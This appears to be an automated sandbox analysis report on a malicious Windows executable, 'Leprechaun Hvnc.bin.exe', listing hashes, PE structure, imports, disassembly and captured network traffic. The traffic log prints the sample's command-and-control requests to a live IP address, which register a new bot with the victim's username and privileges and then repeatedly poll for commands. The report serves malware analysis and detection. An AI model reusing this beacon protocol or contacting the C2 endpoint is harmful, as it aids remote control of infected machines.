Overall analysis duration:	0h 3m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Leprechaun Hvnc.bin.exe
Detection:	MAL
Classification:	mal60.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 8 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Leprechaun Hvnc.bin.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
65.20.106.109	CrHadzetWq.exe	Get hash	malicious	Unknown	Browse	65.20.106.109/c2.php?action=fetchcommand&botid=e8c9bdcf361ca
65.20.106.109	CrHadzetWq.exe	Get hash	malicious	Unknown	Browse	65.20.106.109/c2.php?action=fetchcommand&botid=0d34581d70ab2

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CP-ASDE	https://wd21.privrendom.com/	Get hash	malicious	Unknown	Browse	65.21.235.194
	SecuriteInfo.com.BackDoor.SpyBotNET.62.3223.1756.exe	Get hash	malicious	Vidar	Browse	65.21.109.161
	HTTPS://VALLESTRANSPORT.COM	Get hash	malicious	Unknown	Browse	65.21.63.132
	Rtq5bR0yeF.exe	Get hash	malicious	RedLine	Browse	65.21.63.6
	wtrD6RiHlm.exe	Get hash	malicious	RedLine	Browse	65.21.63.6
	SjLTg00G6b.elf	Get hash	malicious	Mirai	Browse	65.20.206.157
	kyqWhhZB9T.exe	Get hash	malicious	RedLine	Browse	65.21.63.6
	101764ZAM2024.exe	Get hash	malicious	AgentTesla	Browse	65.21.125.228
	SecuriteInfo.com.FileRepMalware.10630.9616.exe	Get hash	malicious	Unknown	Browse	65.21.73.35
	https://neweventx.bgmis-mobile.com/	Get hash	malicious	HTMLPhisher	Browse	65.21.235.194

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.064831007611413
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Leprechaun Hvnc.bin.exe
File size:	16'384 bytes
MD5:	e497f871973ee2d1e1a42680efa369e3
SHA1:	a694ee791e04b0f60ed48e304a694faec9437e4d
SHA256:	3f58c4d27a63e7cac54346db50bde86788e6706e6f730cbff29862284f2150cb
SHA512:	5bf27e35d2a7b1d420926b751dab6bb586b69e20f7f18946215e5ae17e1330c79a1da182f977ec8f2615af37e267c6558b66d4172f3cf96386a848ef5bdea034
SSDEEP:	192:g+ACeYqeviSJDCWzvYeFqfrPwolraE/cmOPoR4y3Qkuu5LjjfO7If++iuLa3wRy:vqYqepmsvVFqf7kmOPoR4XkHoIKKfR
TLSH:	E2721810EEE08F22D4F346B864FC6796453D28599F7581FF299124B8CC716C3A936B27
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........G...G...G.......N...G...b...-Y..D...-Y..F...RichG...........PE..L......f...............&.*...........3.......@....@........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4033e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660190D6 [Mon Mar 25 14:57:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	7b4aa3f51180154f434776a3c7ed1e5b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 5Ch
push 00404634h
call dword ptr [00404040h]
test eax, eax
jne 00007FEB40E966F5h
push FFFFFFF5h
call dword ptr [00404024h]
push 00000000h
lea ecx, dword ptr [ebp-10h]
push ecx
push 00000021h
push 00404650h
push eax
call dword ptr [00404064h]
or eax, FFFFFFFFh
mov esp, ebp
pop ebp
ret
push 00404694h
push eax
call dword ptr [0040403Ch]
mov dword ptr [00405008h], eax
test eax, eax
jne 00007FEB40E966F5h
push FFFFFFF5h
call dword ptr [00404024h]
push 00000000h
lea ecx, dword ptr [ebp-10h]
push ecx
push 00000032h
push 004046A8h
push eax
call dword ptr [00404064h]
or eax, FFFFFFFFh
mov esp, ebp
pop ebp
ret
push 00404710h
push 00000001h
push 00000000h
call dword ptr [00404070h]
call dword ptr [0040406Ch]
cmp eax, 000000B7h
jne 00007FEB40E966D8h
xor eax, eax
mov esp, ebp
pop ebp
ret
push ebx
push esi
push edi
mov edi, dword ptr [00404050h]
mov ebx, dword ptr [00404030h]
mov esi, dword ptr [00404024h]
call 00007FEB40E94BF9h
test eax, eax
je 00007FEB40E966C9h
push 00000050h
push 00404720h
push eax
call 00007FEB40E94BC8h
add esp, 0Ch
mov dword ptr [00405000h], eax
test eax, eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4a00	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0x264	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x48f4	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4000	0xa8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29fd	0x2a00	e0cf41e0a53c4bc2d176b43ebfccb92f	False	0.5554315476190477	data	6.413186883989941	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4000	0xd86	0xe00	8f7321e8fb500920f43325a796dc311b	False	0.43080357142857145	data	4.248176411884191	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5000	0x20	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x6000	0x264	0x400	c0ab20af8b16d5b9bfb79a51dd3c1e4a	False	0.572265625	data	4.642035244811374	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
WININET.dll	HttpSendRequestW, HttpOpenRequestW, InternetReadFile, InternetConnectW, InternetOpenW
KERNEL32.dll	GetEnvironmentVariableA, CreateDirectoryA, GetStdHandle, VerSetConditionMask, HeapFree, GetProcessHeap, CreateProcessA, GetModuleFileNameA, GetProcAddress, LoadLibraryW, lstrcmpW, lstrcpyW, lstrcatA, HeapAlloc, lstrlenW, CopyFileA, VerifyVersionInfoW, WriteConsoleA, WriteConsoleW, HeapReAlloc, GetLastError, CreateMutexA, Sleep, lstrcmpA, lstrcatW
ADVAPI32.dll	RegCreateKeyW, RegCloseKey, GetUserNameW, RegSetKeyValueA, RegQueryValueExW, RegOpenKeyW
SHELL32.dll

Network Behavior

Download Network PCAP: filtered – full

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 14, 2024 16:40:58.964314938 CEST	49712	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:40:58.969182014 CEST	80	49712	65.20.106.109	192.168.2.6
Jun 14, 2024 16:40:58.969284058 CEST	49712	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:40:58.969537973 CEST	49712	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:40:58.974246979 CEST	80	49712	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:07.442704916 CEST	80	49712	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:07.442919970 CEST	49712	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:07.443388939 CEST	49712	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:07.445677042 CEST	49715	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:07.448148966 CEST	80	49712	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:07.450537920 CEST	80	49715	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:07.450622082 CEST	49715	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:07.450814962 CEST	49715	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:07.455640078 CEST	80	49715	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:15.923068047 CEST	80	49715	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:15.923311949 CEST	49715	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:15.923311949 CEST	49715	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:15.924308062 CEST	49719	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:15.928642988 CEST	80	49715	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:15.929261923 CEST	80	49719	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:15.929338932 CEST	49719	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:15.929435968 CEST	49719	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:15.934220076 CEST	80	49719	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:24.403778076 CEST	80	49719	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:24.403879881 CEST	49719	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:24.403974056 CEST	49719	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:24.405263901 CEST	49723	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:24.408843994 CEST	80	49719	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:24.410137892 CEST	80	49723	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:24.410224915 CEST	49723	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:24.410379887 CEST	49723	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:24.415169001 CEST	80	49723	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:32.896810055 CEST	80	49723	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:32.896934032 CEST	49723	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:32.897016048 CEST	49723	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:32.898121119 CEST	49725	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:32.904788971 CEST	80	49723	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:32.905833006 CEST	80	49725	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:32.905973911 CEST	49725	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:32.906147957 CEST	49725	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:32.910924911 CEST	80	49725	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:41.374262094 CEST	80	49725	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:41.374342918 CEST	49725	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:41.374418974 CEST	49725	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:41.375643015 CEST	49727	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:41.379250050 CEST	80	49725	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:41.380521059 CEST	80	49727	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:41.380595922 CEST	49727	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:41.380737066 CEST	49727	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:41.385602951 CEST	80	49727	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:49.885929108 CEST	80	49727	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:49.886130095 CEST	49727	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:49.886130095 CEST	49727	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:49.887300968 CEST	49729	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:49.890961885 CEST	80	49727	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:49.892086983 CEST	80	49729	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:49.892162085 CEST	49729	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:49.892290115 CEST	49729	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:49.897006035 CEST	80	49729	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:58.379797935 CEST	80	49729	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:58.379878998 CEST	49729	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:58.379935980 CEST	49729	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:58.381388903 CEST	49731	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:58.384696960 CEST	80	49729	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:58.386236906 CEST	80	49731	65.20.106.109	192.168.2.6
Jun 14, 2024 16:41:58.386327982 CEST	49731	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:58.386521101 CEST	49731	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:41:58.392415047 CEST	80	49731	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:06.865505934 CEST	80	49731	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:06.865783930 CEST	49731	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:06.865784883 CEST	49731	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:06.867460966 CEST	49733	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:06.872396946 CEST	80	49731	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:06.872415066 CEST	80	49733	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:06.872536898 CEST	49733	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:06.872760057 CEST	49733	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:06.877526045 CEST	80	49733	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:15.344888926 CEST	80	49733	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:15.345041037 CEST	49733	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:15.345138073 CEST	49733	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:15.346776962 CEST	49735	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:15.349934101 CEST	80	49733	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:15.351867914 CEST	80	49735	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:15.351988077 CEST	49735	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:15.352087021 CEST	49735	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:15.356853962 CEST	80	49735	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:23.832591057 CEST	80	49735	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:23.832779884 CEST	49735	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:23.832874060 CEST	49735	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:23.834291935 CEST	49736	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:23.838462114 CEST	80	49735	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:23.839230061 CEST	80	49736	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:23.839306116 CEST	49736	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:23.839447021 CEST	49736	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:23.844894886 CEST	80	49736	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:32.321790934 CEST	80	49736	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:32.321938038 CEST	49736	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:32.322033882 CEST	49736	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:32.323543072 CEST	49737	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:32.327486038 CEST	80	49736	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:32.328654051 CEST	80	49737	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:32.328761101 CEST	49737	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:32.328937054 CEST	49737	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:32.334161997 CEST	80	49737	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:40.812381029 CEST	80	49737	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:40.812510967 CEST	49737	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:40.812597990 CEST	49737	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:40.813888073 CEST	49738	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:40.818528891 CEST	80	49737	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:40.818749905 CEST	80	49738	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:40.818835020 CEST	49738	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:40.818985939 CEST	49738	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:40.823726892 CEST	80	49738	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:49.299453020 CEST	80	49738	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:49.299756050 CEST	49738	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:49.299871922 CEST	49738	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:49.301242113 CEST	49741	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:49.304780006 CEST	80	49738	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:49.306054115 CEST	80	49741	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:49.306128025 CEST	49741	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:49.306262016 CEST	49741	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:49.311244965 CEST	80	49741	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:57.772859097 CEST	80	49741	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:57.772989035 CEST	49741	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:57.773206949 CEST	49741	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:57.774775982 CEST	49742	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:57.777957916 CEST	80	49741	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:57.779728889 CEST	80	49742	65.20.106.109	192.168.2.6
Jun 14, 2024 16:42:57.779810905 CEST	49742	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:57.780006886 CEST	49742	80	192.168.2.6	65.20.106.109
Jun 14, 2024 16:42:57.784801006 CEST	80	49742	65.20.106.109	192.168.2.6

HTTP Request Dependency Graph

65.20.106.109

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49712	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:40:58.969537973 CEST	266	OUT	GET /c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges=Admin HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49715	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:41:07.450814962 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49719	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:41:15.929435968 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49723	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:41:24.410379887 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49725	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:41:32.906147957 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49727	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:41:41.380737066 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49729	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:41:49.892290115 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49731	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:41:58.386521101 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49733	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:42:06.872760057 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49735	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:42:15.352087021 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49736	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:42:23.839447021 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49737	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:42:32.328937054 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49738	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:42:40.818985939 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49741	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:42:49.306262016 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49742	65.20.106.109	80	6892	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 16:42:57.780006886 CEST	214	OUT	GET /c2.php?action=fetchcommand&botid= HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' Host: 65.20.106.109

Statistics

CPU Usage

• Leprechaun Hvnc.bin.exe

Click to jump to process

Memory Usage

• Leprechaun Hvnc.bin.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Target ID:	0
Start time:	10:40:56
Start date:	14/06/2024
Path:	C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe"
Imagebase:	0x490000
File size:	16'384 bytes
MD5 hash:	E497F871973EE2D1E1A42680EFA369E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	52.8%
Total number of Nodes:	125
Total number of Limit Nodes:	7

Callgraph

Hide Legend

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

